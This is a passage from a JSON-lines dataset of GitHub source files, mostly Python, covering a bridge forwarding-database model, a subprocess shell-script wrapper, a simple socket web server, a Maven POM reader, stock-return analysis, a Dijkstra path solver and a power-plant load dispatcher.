return\n","repo_name":"KeckObservatory/kcwi_python","sub_path":"lib/1.0/Helper.py","file_name":"Helper.py","file_ext":"py","file_size_in_byte":5874,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"4025976643","text":"import logging\nimport time\n\nDEFAULT_AGE = 300\n\n\nclass FDBEntry(object):\n '''FDB Entry'''\n def __init__(self, mac, vlan, source, dst_ports=None, age=DEFAULT_AGE):\n # pylint: disable=too-many-instance-attributes\n # pylint: disable=too-many-arguments\n self._mac = mac\n self._source = source\n self._dst_ports = dst_ports\n self._is_broadcast = is_bmcast(mac)\n self._vlan = vlan\n self._age = age\n self.last_seen = 0 # this one needs to be public for testing\n self.refresh()\n\n @property\n def ports(self):\n '''Port list to direct traffic to.'''\n return self._dst_ports\n\n @property\n def mac(self):\n '''MAC for this fdb entry'''\n return self._mac\n\n @property\n def is_broadcast(self):\n '''Is this Broadcast or Multicast'''\n return self._is_broadcast\n\n @property\n def vlan(self):\n '''vlan for this fdb entry'''\n return self._vlan\n\n @property\n def source(self):\n '''Source port for this fdb entry'''\n return self._source\n\n def refresh(self):\n '''Refresh this entry'''\n self.last_seen = time.time()\n self._expiry = self.last_seen + self._age\n\n def add_port(self, dst_port):\n '''Add a dst port'''\n try:\n self._dst_ports.index(dst_port)\n except ValueError:\n 
self._dst_ports.append(dst_port)\n\n def del_port(self, dst_port):\n '''Add a dst port'''\n try:\n self._dst_ports.remove(dst_port)\n except ValueError:\n pass\n\n\nclass FDB(object):\n '''A python representation of the linux bridge forwarding\n database. By default reads from sysfs and expects a linux\n bridge instance. Read methods can be overriden to support\n other backends.'''\n def __init__(self):\n self._records = {}\n\n def get_entry(self, mac, vlan):\n '''Get entry from fdb for this mac - note that a mac can be\n present on any number of vlans, thus you need to hash\n on mac + vlan'''\n return self._records[\"{}-{}\".format(vlan, mac)]\n\n def add_entry(self, entry):\n '''Add entry from fdb for this mac - note that a mac can be\n present on any number of vlans, thus you need to hash\n on mac + vlan'''\n self._records[\"{}-{}\".format(entry.vlan, entry.mac)] = entry\n\n def delete_entry(self, entry):\n '''Delete entry from fdb for this mac - note that a mac can be\n present on any number of vlans, thus you need to hash\n on mac + vlan'''\n del self._records[\"{}-{}\".format(entry.vlan, entry.mac)]\n\n def del_mcast(self, mac, vlan, port):\n '''Remove a Multicast fdb entry'''\n try:\n old = self.get_entry(mac, vlan)\n try:\n new = FDBEntry(mac, vlan, None, dst_ports=old.ports)\n new.ports.remove(port)\n self.delete_entry(old)\n self.add_entry(new)\n vlan.replace(old, new)\n except ValueError:\n return\n except KeyError:\n pass\n\n def add_mcast(self, mac, vlan, port):\n '''Add a Multicast fdb entry'''\n try:\n old = self.get_entry(mac, vlan)\n try:\n old.ports.index(port)\n return\n except ValueError:\n new = FDBEntry(mac, vlan, None, dst_ports=old.ports + port)\n self.delete_entry(old)\n self.add_entry(new)\n vlan.replace(old, new)\n except KeyError:\n entry = FDBEntry(mac, vlan, None, dst_ports=[port])\n self.add_entry(entry)\n vlan.add(entry)\n\n def learn(self, mac, vlan, source_port):\n '''Add or refresh a mac'''\n try:\n old = self.get_entry(mac, vlan)\n if old.source == source_port:\n old.refresh()\n vlan.refresh(old)\n else:\n self.delete_entry(old)\n new = FDBEntry(mac, vlan, source_port)\n self.add_entry(new)\n vlan.replace(old, new)\n except KeyError:\n entry = FDBEntry(mac, vlan, source_port)\n self.add_entry(entry)\n vlan.add(entry)\n\n def expire(self, mac, vlan):\n '''Delete Mac'''\n try:\n entry = self.get_entry(mac, vlan)\n if entry.vlan is not None:\n vlan.delete(entry)\n self.delete_entry(entry)\n except KeyError:\n logging.error(\"tried to delete inexistent mac %s on vlan %s\", mac, vlan)\n\n\ndef is_bmcast(mac):\n '''Is the mac broadcast or multicast. 
As a\n side effect, validates and parses the mac'''\n\n digits = mac.split(\":\")\n if len(digits) != 6:\n raise ValueError\n for digit in digits:\n hex_form = int(digit, 16)\n if hex_form < 0 or hex_form > 0xff:\n raise ValueError\n return (int(digits[0], 16) & 1) == 1\n","repo_name":"kot-begemot-uk/bess_switch","sub_path":"fdb.py","file_name":"fdb.py","file_ext":"py","file_size_in_byte":5006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34740033556","text":"from utils import *\r\n\r\n\r\ndef ensure_no_dups(curr_filtered_df, isDoc, file_name):\r\n if isDoc and (len(set(curr_filtered_df.database)) > 1 or len(set(curr_filtered_df.topic)) > 1):\r\n print(f\"Document {file_name} is associated to more than one topic/database\")\r\n exit()\r\n if not isDoc and len(set(curr_filtered_df.database)) > 1:\r\n print(f\"topic {file_name} is associated to more than one database\")\r\n exit()\r\n\r\n\r\ndef save_json_file(df, helper_dir, isDoc):\r\n\r\n file_name_col = 'documentFile' if isDoc else \"topic\"\r\n sent_ind_col = 'docSentCharIdx' if isDoc else \"scuSentCharIdx\"\r\n\r\n filtered_df = df.drop_duplicates(subset=[file_name_col, sent_ind_col])\r\n\r\n for file_name in set(filtered_df[file_name_col]):\r\n curr_filtered_df = filtered_df.loc[filtered_df[file_name_col] == file_name]\r\n curr_filtered_df = curr_filtered_df.sort_values(by=[sent_ind_col])\r\n ensure_no_dups(curr_filtered_df, isDoc, file_name)\r\n\r\n database = str(int(list(curr_filtered_df.database)[0]))\r\n topic = list(curr_filtered_df.topic)[0]\r\n\r\n\r\n if isDoc:\r\n create_dir([helper_dir, \"jsons_files\", \"documents\", database, topic])\r\n out_json_file = os.path.join(helper_dir, \"jsons_files\", \"documents\", database, topic, f\"{file_name}.json\")\r\n else:\r\n create_dir([helper_dir, \"jsons_files\", \"summaries\", database])\r\n out_json_file = os.path.join(helper_dir, \"jsons_files\", \"summaries\", database, f\"{file_name}.json\")\r\n\r\n with open(out_json_file, 'w') as fp:\r\n num_row = curr_filtered_df.shape[0]\r\n for i, row in curr_filtered_df.iterrows():\r\n curr_sent = row[\"docSentText\"] if isDoc else row[\"scuSentence\"]\r\n curr_sent_ind = row[sent_ind_col]\r\n json.dump({\"sentence\": curr_sent, \"sent_index\": curr_sent_ind}, fp)\r\n if i != num_row - 1:\r\n fp.write(\"\\n\")\r\n\r\n\r\ndef save_json_file_wrapper(df, helper_dir):\r\n save_json_file(df, helper_dir, True) # documents\r\n save_json_file(df, helper_dir, False) # summaries\r\n\r\n\r\ndef main(args):\r\n indir = args.indir\r\n\r\n helper_dir = os.path.join(os.path.dirname(indir), HELPER_DIR_NAME)\r\n\r\n\r\n df = pd.read_csv(indir)\r\n save_json_file_wrapper(df, helper_dir)\r\n print(f'done saving sentences to json files in {os.path.join(helper_dir, \"QAs\", \"combined\")}')\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n argparser = argparse.ArgumentParser(description=\"\")\r\n argparser.add_argument(\"-i\", \"--indir\", required=True, help=\"path to train_full_details_with_oies_no_duplications.csv\")\r\n main(argparser.parse_args())","repo_name":"lovodkin93/automatic_aligned_QASem_spans","sub_path":"retrain_superPal_preprocess/get_jsons.py","file_name":"get_jsons.py","file_ext":"py","file_size_in_byte":2674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16191566198","text":"import subprocess\nimport tempfile\nimport shutil\nimport signal\nimport os\nimport time\nimport random\nimport atexit\nfrom 
typing import Optional, List, Any\nfrom ._preventkeyboardinterrupt import PreventKeyboardInterrupt\nfrom ._daemon_connection import _kachery_temp_dir\n\n_running_scripts = {}\n\nclass ShellScript():\n def __init__(self, script: str, script_path: Optional[str]=None, keep_temp_files: bool=False, verbose: bool=False, label='', redirect_output_to_stdout=False):\n self._script_path = script_path\n self._keep_temp_files = keep_temp_files\n self._process: Optional[subprocess.Popen] = None\n self._files_to_remove: List[str] = []\n self._dirs_to_remove: List[str] = []\n self._start_time: Optional[float] = None\n self._verbose = verbose\n self._label = label\n self._redirect_output_to_stdout = redirect_output_to_stdout\n self._script_id = _random_string(10)\n\n lines = script.splitlines()\n lines = self._remove_initial_blank_lines(lines)\n if len(lines) > 0:\n num_initial_spaces = self._get_num_initial_spaces(lines[0])\n for ii, line in enumerate(lines):\n if len(line.strip()) > 0:\n n = self._get_num_initial_spaces(line)\n if n < num_initial_spaces:\n print(script)\n raise Exception('Problem in script. First line must not be indented relative to others')\n lines[ii] = lines[ii][num_initial_spaces:]\n self._script = '\\n'.join(lines)\n\n def substitute(self, old: str, new: Any) -> None:\n self._script = self._script.replace(old, '{}'.format(new))\n\n def write(self, script_path: Optional[str]=None) -> None:\n if script_path is None:\n script_path = self._script_path\n if script_path is None:\n raise Exception('Cannot write script. No path specified')\n with open(script_path, 'w', newline='\\n') as f:\n f.write(self._script)\n os.chmod(script_path, 0o744)\n\n def start(self) -> None:\n if self._script_path is not None:\n script_path = self._script_path\n else:\n tempdir = tempfile.mkdtemp(prefix='tmp_shellscript_', dir=_kachery_temp_dir())\n script_path = os.path.join(tempdir, 'script.sh')\n self._dirs_to_remove.append(tempdir) \n self.write(script_path)\n cmd = script_path\n if self._verbose:\n print('RUNNING SHELL SCRIPT: ' + cmd)\n self._start_time = time.time()\n _running_scripts[self._script_id] = self\n if self._redirect_output_to_stdout:\n self._process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n else:\n self._process = subprocess.Popen(cmd)\n\n def wait(self, timeout=None) -> Optional[int]:\n timeout_increment = 0.01\n if timeout is None or (timeout > timeout_increment):\n timer = time.time()\n while True:\n retcode = self.wait(timeout=timeout_increment)\n if retcode is not None:\n self._cleanup()\n return retcode\n if timeout is not None:\n elapsed = time.time() - timer\n if elapsed > timeout:\n return None\n\n if not self.isRunning():\n self._print_stdout()\n self._cleanup()\n return self.returnCode()\n assert self._process is not None, \"Unexpected self._process is None even though it is running.\"\n try:\n retcode = self._process.wait(timeout=timeout)\n except:\n retcode = None\n finally:\n self._print_stdout()\n if retcode is not None:\n self._cleanup()\n return retcode\n \n def _print_stdout(self):\n if not self._redirect_output_to_stdout:\n return\n if self._process is None:\n return\n for line in self._process.stdout:\n if isinstance(line, bytes):\n line = line.decode('utf-8')\n print(line)\n\n def _cleanup(self) -> None:\n try:\n if not hasattr(self, '_dirs_to_remove'):\n return\n if self._keep_temp_files:\n return\n for dirpath in self._dirs_to_remove:\n _rmdir_with_retries(dirpath, num_retries=5)\n except:\n print('WARNING: Problem in cleanup() of 
ShellScript')\n finally:\n if self._script_id in _running_scripts:\n del _running_scripts[self._script_id]\n\n def stop(self) -> None:\n with PreventKeyboardInterrupt():\n if not self.isRunning():\n return\n assert self._process is not None, \"Unexpected self._process is None even though it is running.\"\n\n try:\n signals = [signal.SIGINT, signal.SIGINT, signal.SIGINT] + [signal.SIGTERM, signal.SIGTERM, signal.SIGTERM] + [signal.SIGKILL]\n signal_strings = ['SIGINT', 'SIGINT', 'SIGINT'] + ['SIGTERM', 'SIGTERM', 'SIGTERM'] + ['SIGKILL']\n delays = [5, 5, 5] + [5, 5, 5] + [1]\n\n for iis in range(len(signals)):\n self._process.send_signal(signals[iis])\n try:\n self._process.wait(timeout=delays[iis])\n return\n except:\n pass\n finally:\n self._cleanup()\n\n def kill(self) -> None:\n if not self.isRunning():\n return\n \n assert self._process is not None, \"Unexpected self._process is None even though it is running.\"\n self._process.send_signal(signal.SIGKILL)\n try:\n self._process.wait(timeout=1)\n except:\n print('WARNING: unable to kill shell script.')\n pass\n\n def stopWithSignal(self, sig, timeout) -> bool:\n if not self.isRunning():\n return True\n \n assert self._process is not None, \"Unexpected self._process is None even though it is running.\"\n self._process.send_signal(sig)\n try:\n self._process.wait(timeout=timeout)\n return True\n except:\n return False\n\n def elapsedTimeSinceStart(self) -> Optional[float]:\n if self._start_time is None:\n return None\n \n return time.time() - self._start_time\n\n def isRunning(self) -> bool:\n if not self._process:\n return False\n retcode = self._process.poll()\n if retcode is None:\n return True\n return False\n\n def isFinished(self) -> bool:\n if not self._process:\n return False\n return not self.isRunning()\n\n def returnCode(self) -> Optional[int]:\n if not self.isFinished():\n raise Exception('Cannot get return code before process is finished.')\n assert self._process is not None, \"Unexpected self._process is None even though it is finished.\"\n return self._process.returncode\n\n def scriptPath(self) -> Optional[str]:\n return self._script_path\n\n def _remove_initial_blank_lines(self, lines: List[str]) -> List[str]:\n ii = 0\n while ii < len(lines) and len(lines[ii].strip()) == 0:\n ii = ii + 1\n return lines[ii:]\n\n def _get_num_initial_spaces(self, line: str) -> int:\n ii = 0\n while ii < len(line) and line[ii] == ' ':\n ii = ii + 1\n return ii\n \n @staticmethod\n def test():\n _test_shellscript()\n\ndef stop_all_scripts():\n x = list(_running_scripts.values())\n for s in x:\n s.stop()\n\ndef _random_string(num_chars: int) -> str:\n chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'\n return ''.join(random.choice(chars) for _ in range(num_chars))\n\ndef _rmdir_with_retries(dirname, num_retries, delay_between_tries=1):\n for retry_num in range(1, num_retries + 1):\n if not os.path.exists(dirname):\n return\n try:\n shutil.rmtree(dirname)\n break\n except: # pragma: no cover\n if retry_num < num_retries:\n print('Retrying to remove directory: {}'.format(dirname))\n time.sleep(delay_between_tries)\n else:\n raise Exception('Unable to remove directory after {} tries: {}'.format(num_retries, dirname))\n\n# def _test_error_handling_1():\n# import pytest\n# with pytest.raises(Exception):\n# ShellScript(\"\"\"\n# #/bin/bash\n# echo \"bad indent\"\n# \"\"\")\n \n# ss = ShellScript(\"\"\"\n# #!/bin/bash\n\n# sleep 15\n# \"\"\")\n# assert ss.elapsedTimeSinceStart() is None\n# assert ss.isRunning() == False\n# 
assert ss.isFinished() == False\n# ss.start()\n# assert ss.isRunning() == True\n# assert ss.isFinished() == False\n# with pytest.raises(Exception):\n# ## cannot get return code while running\n# ss.returnCode()\n# ss.stop()\n# assert ss.elapsedTimeSinceStart() < 10\n\n# ss.start()\n# ss.kill()\n# assert ss.elapsedTimeSinceStart() < 10\n\n# # it's okay to stop it if it isn't running\n# assert ss.stop() is None\n# assert ss.kill() is None\n# assert ss.stopWithSignal(signal.SIGINT, timeout=1) == True\n\n# for sig in [signal.SIGINT, signal.SIGTERM, signal.SIGKILL]:\n# ss.start()\n# assert ss.isRunning() == True\n# ss.stopWithSignal(sig, timeout=0.1)\n# assert ss.isRunning() == False\n# assert ss.elapsedTimeSinceStart() < 10\n\ndef _test_coverage():\n from ._temporarydirectory import TemporaryDirectory\n with TemporaryDirectory() as tmpdir:\n _rmdir_with_retries(dirname=tmpdir + '/does-not-exist', num_retries=1)\n\ndef _test_shellscript():\n from ._temporarydirectory import TemporaryDirectory\n with TemporaryDirectory() as tmpdir:\n fname = tmpdir + '/file1.txt'\n text0 = 'some-test-text'\n ss = ShellScript(f\"\"\"\n #!/bin/bash\n\n echo \"{text0}\" > {fname}\n \"\"\")\n ss.start()\n ss.wait(timeout=5)\n with open(fname, 'r') as f:\n txt = str(f.read())\n print(f'txt = {txt}')\n assert txt == text0 + '\\n'\n assert ss.returnCode() == 0\n print(f'Script path: {ss.scriptPath()}')\n \n # _test_error_handling_1()\n _test_coverage()\n\natexit.register(stop_all_scripts)","repo_name":"flatironinstitute/kachery-p2p","sub_path":"kachery_p2p/_shellscript.py","file_name":"_shellscript.py","file_ext":"py","file_size_in_byte":10532,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"41826951471","text":"from math import floor\ntournaments = int(input())\nstarting_points = int(input())\npoints = 0\ntotal_points = 0\nw = 0\naverage = 0\nfor i in range(1, tournaments + 1):\n result = input()\n if result == \"W\":\n w += 1\n points += 2000\n elif result == \"F\":\n points += 1200\n elif result == \"SF\":\n points += 720\naverage = floor(points / tournaments)\ntotal_points = points + starting_points\nw_p = w / tournaments * 100\nprint(f\"Final points: {total_points}\")\nprint(f\"Average points: {average}\")\nprint(f\"{w_p:.2f}%\")\n\n","repo_name":"GeorgiZdravchev/SoftUni","sub_path":"programing_fundamentals/week4/tennis_ranklist.py","file_name":"tennis_ranklist.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23256477224","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport os \nos.chdir(r\"C:\\Users\\skytr\\OneDrive\\문서\\PythonBasic\\csv\\stock analysis\\stocks\")\nstocks = os.listdir()\nprint(stocks)\nr = lambda x : x.astype(float)\n# major_index = ('Date', 'Prev_ror_x','ror_day_x','Prev_Close_x','Open_x','Close_x','rate_of_return_x')\ndef create_df(name_of_stock_csv):\n df = pd.read_csv(name_of_stock_csv)\n x = r(df['Open'])\n y = r(df['Close'])\n df['rate_of_return'] = (y - x)*100/x\n df['diff'] = y - x\n df['hl_diff'] = r(df['High']) - r(df['Low']) \n df = df.sort_values(by='Date', ascending=True)\n # 전날의 종가\n df['Prev_Close'] = df['Close'].shift(1) \n df['Prev_ror'] = df['rate_of_return'].shift(1) \n df['ror_day'] = (df['Open']-df['Prev_Close'])*100/df['Prev_Close'] # 전날 종가 대비 다음날 시가 수익률\n df.columns = ['Date']+[col + \"_\"+name_of_stock_csv[:-4] for col in df.columns if col != \"Date\"]\n return df\n\ndf = create_df(stocks[0]) 
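# (editor's note) at this point df holds the frame for the first CSV in stocks; the
# loop below inner-joins each remaining ticker on "Date", keeping only trading days
# present in every file. Column clashes are avoided because create_df suffixes every
# non-Date column with the file name, e.g. Close_SOXL for SOXL.csv.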
\n\nfor i in stocks[1:]:\n df = pd.merge(df,create_df(i), on=\"Date\")\n \nprint(df.head())\n# df = pd.merge(create_df('SOXL'), create_df('SOXS'), on=\"Date\" )\n\n# print(df.sort_values(by=\"rate_of_return\", ascending=False))\ndf.to_clipboard()\n\n#plt.plot(df['ror_day_x'][-50:],df['rate_of_return_y'][:50], '*') \n#plt.xticks(rotation=45)\n\n# plt.show()\n# 전날 수익 3% 이상 나고, 시가-종가 수익률 0보다 클때\n# print(df[(df['Prev_ror_x'] > 3) &(df['ror_day_x'] > 0)].sort_values(by='rate_of_return_x', ascending=False).loc[:, major_index][:10])\n# tot = len(df)\n# num = len(df[df['rate_of_return_x']> 0 ])\n# num_2 = len(df[(df['rate_of_return_x']> 2) & (df['Prev_ror_x']> 2) ])\n# num_plusplus = len(df[(df['rate_of_return_x']> 2) & (df['Prev_ror_x']> 3)& (df['ror_day_x']> 0) ])\n\n# num3 = len(df[df['rate_of_return_x']> 3 ])\n\n# ynum_2 = len(df[(df['rate_of_return_y']> 2) & (df['Prev_ror_y']> 2) ])\n# print(f'총거래: {len(df)}') \n# print(f'soxl + 확률: {round(num*100/tot,2) }') \n\n# print(f'이틀 연속 soxl+2 + 확률: {round(num_2*100/tot,2)} 전날 2%이상 오르고 오늘 또 2%이상 오름') \n\n# print(f'soxl\\n전날수익률3+종가수익률+/오늘 수익률+2 : {round(num_plusplus*100/num,2)} 위와 같음') \n\n","repo_name":"skytreesea/PythonBasic","sub_path":"csv/stock analysis/stock_analysis_sox_ver1.py","file_name":"stock_analysis_sox_ver1.py","file_ext":"py","file_size_in_byte":2228,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"26334235343","text":"import xml.etree.ElementTree as XmlTree\nfrom pathlib import Path\nfrom typing import Optional, List\n\nfrom common._maven_module.maven_module_reader_configuration import MavenModuleReaderConfiguration, IgnoredMavenModule, \\\n IgnoredPom\nfrom common.maven_module import MavenModule\nfrom common.release_audience import ReleaseAudience\nfrom common.release_maturity import ReleaseMaturity\n\n\nclass ModuleAttributesMissingException(Exception):\n def __init__(self, pom_file: Path, missing_attributes: List[str]):\n self._pom_file: Path = pom_file\n self._missing_attributes: List[str] = missing_attributes\n\n def __repr__(self) -> str:\n return str(self)\n\n def __str__(self) -> str:\n joined: str = \", \".join(self._missing_attributes)\n return f\"Following attributes are missing in \\\"{self._pom_file.resolve()}\\\": {joined}\"\n\n\nclass ExceptionCollection(Exception):\n def __init__(self):\n self.exceptions: List[Exception] = []\n\n def append(self, exception: Exception) -> \"ExceptionCollection\":\n self.exceptions.append(exception)\n return self\n\n def __repr__(self) -> str:\n return str(self)\n\n def __str__(self) -> str:\n return \"\\n\".join(str(exception) for exception in self.exceptions)\n\n\nclass MavenModuleReader:\n @staticmethod\n def read(pom_file: Path,\n reader_config: Optional[MavenModuleReaderConfiguration] = None,\n verbose: bool = False) -> Optional[MavenModule]:\n return MavenModuleReader(pom_file, reader_config, verbose).get_module()\n\n @staticmethod\n def read_recursively(root: Path,\n reader_config: Optional[MavenModuleReaderConfiguration] = None,\n verbose: bool = False) -> List[MavenModule]:\n return MavenModuleReader._read_recursively(root, root, reader_config, verbose)\n\n @staticmethod\n def _read_recursively(root: Path,\n current_path: Path,\n reader_config: Optional[MavenModuleReaderConfiguration] = None,\n verbose: bool = False) -> List[MavenModule]:\n if current_path.is_file():\n if current_path.name == \"pom.xml\":\n module: Optional[MavenModule] = MavenModuleReader.read(current_path, reader_config, verbose)\n if module is not 
None:\n module._pom_file = module.pom_file.relative_to(root)\n return [module]\n\n return []\n\n modules: List[MavenModule] = []\n exception_collection: ExceptionCollection = ExceptionCollection()\n for path in current_path.iterdir():\n try:\n modules.extend(MavenModuleReader._read_recursively(root, path, reader_config, verbose))\n\n except ExceptionCollection as e:\n exception_collection.exceptions.extend(e.exceptions)\n\n except ModuleAttributesMissingException as e:\n exception_collection.exceptions.append(e)\n\n if len(exception_collection.exceptions) > 0:\n raise exception_collection\n\n return modules\n\n def __init__(self,\n pom_file: Path,\n reader_config: Optional[MavenModuleReaderConfiguration] = None,\n verbose: bool = False):\n self._group_id: Optional[str] = None\n self._artifact_id: Optional[str] = None\n self._packaging: Optional[str] = None\n self._release_audience: Optional[ReleaseAudience] = None\n self._release_maturity: Optional[ReleaseMaturity] = None\n self._pom_file: Path = pom_file\n self._exclude_from_blackduck_scan: Optional[bool] = None\n self._parent_group_id: Optional[str] = None\n self._parent_artifact_id: Optional[str] = None\n\n self._reader_config: MavenModuleReaderConfiguration = reader_config if reader_config is not None else MavenModuleReaderConfiguration()\n self._root_node: XmlTree = XmlTree.parse(pom_file.resolve()).getroot()\n self._verbose: bool = verbose\n\n def get_module(self) -> Optional[MavenModule]:\n maybe_ignored_pom: Optional[IgnoredPom] = self._reader_config.try_find_ignored_pom(self._pom_file)\n if maybe_ignored_pom is not None:\n self._log(f\"Skipping ignored pom \\\"{self._pom_file}\\\": {maybe_ignored_pom.reason}\")\n return None\n\n try:\n self._read_module_properties()\n\n if self._artifact_id is None:\n self._log(f\"Skipping module defined in \\\"{self._pom_file.resolve()}\\\": No artifactId defined\")\n return None\n\n self._read_parent_properties()\n self._inherit_group_id_if_necessary()\n self._read_additional_properties()\n\n except:\n pass\n\n maybe_ignored_module: Optional[IgnoredMavenModule] = self._reader_config.try_find_ignored_module(self._group_id,\n self._artifact_id)\n if maybe_ignored_module is not None:\n self._log(\n f\"Skipping ignored module \\\"{self._group_id}:{self._artifact_id}\\\": {maybe_ignored_module.reason}\")\n return None\n\n self._verify()\n\n self._log(\n f\"Extracted module \\\"{self._group_id}:{self._artifact_id}\\\" from \\\"{self._pom_file.resolve()}\\\"\")\n return MavenModule(self._group_id,\n self._artifact_id,\n self._packaging,\n self._release_audience,\n self._release_maturity,\n self._pom_file,\n self._exclude_from_blackduck_scan,\n self._parent_group_id,\n self._parent_artifact_id)\n\n def _read_module_properties(self) -> None:\n artifact_id_element: XmlTree = self._find(self._root_node, \"artifactId\")\n\n if artifact_id_element is not None:\n self._artifact_id = artifact_id_element.text\n\n group_id_element: XmlTree = self._find(self._root_node, \"groupId\")\n\n if group_id_element is not None:\n self._group_id = group_id_element.text\n\n packaging_type_element: XmlTree = self._find(self._root_node, \"packaging\")\n if packaging_type_element is not None:\n self._packaging = packaging_type_element.text\n else:\n self._packaging = \"jar\"\n\n def _read_parent_properties(self) -> None:\n parent_root: XmlTree = self._find(self._root_node, \"parent\")\n if parent_root is None:\n return\n\n self._parent_group_id = self._find_or_raise(parent_root, \"groupId\").text\n self._parent_artifact_id = 
self._find_or_raise(parent_root, \"artifactId\").text\n\n def _inherit_group_id_if_necessary(self) -> None:\n if self._group_id is None and self._parent_group_id is not None:\n self._group_id = self._parent_group_id\n\n def _read_additional_properties(self) -> None:\n properties_root: XmlTree = self._find_or_raise(self._root_node, \"properties\")\n\n self._release_audience = ReleaseAudience(self._find_or_raise(properties_root, \"x-sap-release-audience\").text)\n self._release_maturity = ReleaseMaturity(self._find_or_raise(properties_root, \"x-sap-release-maturity\").text)\n\n exclude_from_blackduck_scan_element: XmlTree = self._find(properties_root,\n \"x-sap-exclude-from-blackduck-scan\")\n if exclude_from_blackduck_scan_element is not None:\n self._exclude_from_blackduck_scan = bool(exclude_from_blackduck_scan_element.text)\n\n def _verify(self) -> None:\n missing_properties: List[str] = []\n\n if self._artifact_id is None:\n missing_properties.append(\"artifactId\")\n\n if self._group_id is None:\n missing_properties.append(\"groupId\")\n\n if self._packaging is None:\n missing_properties.append(\"packaging\")\n\n if self._release_audience is None:\n missing_properties.append(\"releaseAudience\")\n\n if self._release_maturity is None:\n missing_properties.append(\"releaseMaturity\")\n\n if self._exclude_from_blackduck_scan is None:\n self._exclude_from_blackduck_scan = False\n\n if self._parent_group_id is not None and self._parent_artifact_id is None:\n missing_properties.append(\"parentArtifactId\")\n elif self._parent_group_id is None and self._parent_artifact_id is not None:\n missing_properties.append(\"parentGroupId\")\n\n if len(missing_properties) > 0:\n ex: ModuleAttributesMissingException = ModuleAttributesMissingException(self._pom_file, missing_properties)\n self._log(str(ex))\n raise ex\n\n def _log(self, message: str) -> None:\n if self._verbose:\n print(message)\n\n def _find_or_raise(self, parent: XmlTree, tag: str) -> XmlTree:\n found_node: XmlTree = MavenModuleReader._find(parent, tag)\n\n if found_node is None:\n raise Exception(\n f\"Unable to find xml tag \\\"{parent.tag}/{tag}\\\" in \\\"{self._pom_file.resolve()}\\\".\")\n\n return found_node\n\n @staticmethod\n def _find(parent: XmlTree, tag: str) -> XmlTree:\n return parent.find(f\"{{http://maven.apache.org/POM/4.0.0}}{tag}\")\n","repo_name":"SAP/cloud-sdk-java","sub_path":"scripts/common/_maven_module/maven_module_reader.py","file_name":"maven_module_reader.py","file_ext":"py","file_size_in_byte":9401,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"39775909861","text":"import socket\n\n\nclass WebServer(object):\n def __init__(self):\n with socket.socket() as tcp_socket:\n # 防止端口占用\n tcp_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n # 绑定端口\n tcp_socket.bind(('', 8080))\n # 监听\n tcp_socket.listen()\n # 等待客户端连接\n while True:\n self.client_socket, self.client_addr = tcp_socket.accept()\n self.handle()\n\n def handle(self):\n with self.client_socket:\n print(f\"[来自{self.client_addr}的消息:\")\n data = self.client_socket.recv(2048)\n if data:\n print(data.decode(\"utf-8\"))\n self.client_socket.send(\n b\"HTTP/1.1 200 ok\\r\\nContent-Type: text/html;charset=utf-8\\r\\n\\r\\n
<html><body>Web Server Test</body></html>
\"\n )\n\n\nif __name__ == \"__main__\":\n WebServer()\n","repo_name":"lotapp/BaseCode","sub_path":"python/6.net/4.web/2.webserver/1.webserver1.py","file_name":"1.webserver1.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"} +{"seq_id":"74966099075","text":"#Constroe colunas do jogo Mario\ndef main():\n altura = pegar_altura()\n for i in range(altura):\n print(\"#\") \n\n #faz a saída sem quebrar linha, escrevendo quatro ?\n print(\"?\" * 4, end=\"\") #default do parametro end é \"\\n\" \n print()\n print()\n\n for i in range(3):\n print(\"#\" * 3)\n \ndef pegar_altura():\n while True:\n try:\n n = int(input(\"Altura: \"))\n if n > 0:\n break\n except ValueError:\n print(\"Não é um número inteiro\")\n return n\n\nmain()\n","repo_name":"danielrossi-gt/Python","sub_path":"Mario/mario.py","file_name":"mario.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38065403417","text":"import sys\nimport heapq\ninput = sys.stdin.readline\nnm = [[-1, 0], [0, -1], [1, 0], [0, 1]]\na = 1\nwhile a:\n n = int(input())\n if n == 0:\n break\n cave = [list(map(int, input().split())) for _ in range(n)]\n dist = [[sys.maxsize for _ in range(n)] for _ in range(n)]\n dist[0][0] = cave[0][0]\n q = [[cave[0][0],0,0]]\n while q:\n dis,x,y = heapq.heappop(q)\n if x==n-1 and y==n-1:\n print('Problem {}: {}'.format(a,dis))\n a+=1\n break\n if dis > dist[x][y]:\n continue\n for [nx,ny] in nm:\n tx = x+nx\n ty = y+ny\n if 0<=tx 0 and current_element['minimum_price'] < feature[current_position-1]['minimum_price']:\r\n \r\n #change position\r\n feature[current_position] = feature[current_position-1]\r\n current_position -= 1\r\n \r\n #updating current element\r\n feature[current_position] = current_element\r\n return(feature)\r\n\r\n#######################################################################################\r\n#function to dispatch the load following on the sorting order found by the function sort\r\ndef load_attribution(data):\r\n feature=sort(data)\r\n load = data['load']\r\n \r\n #initialization of variables\r\n name_total = []\r\n p_total = []\r\n p=0\r\n \r\n for j in range (len(feature)):\r\n #if the load has been totally dispatched the next values will all be 0\r\n if load <= 0:\r\n p = 0\r\n \r\n else: \r\n #adding load for windturbines\r\n if feature[j]['type'] == 'windturbine':\r\n p = feature[j]['pmax']*data['fuels']['wind(%)']/100\r\n #if the p is too hign it takes the value of the remaining load\r\n if p > load:\r\n p = load\r\n \r\n #adding load for 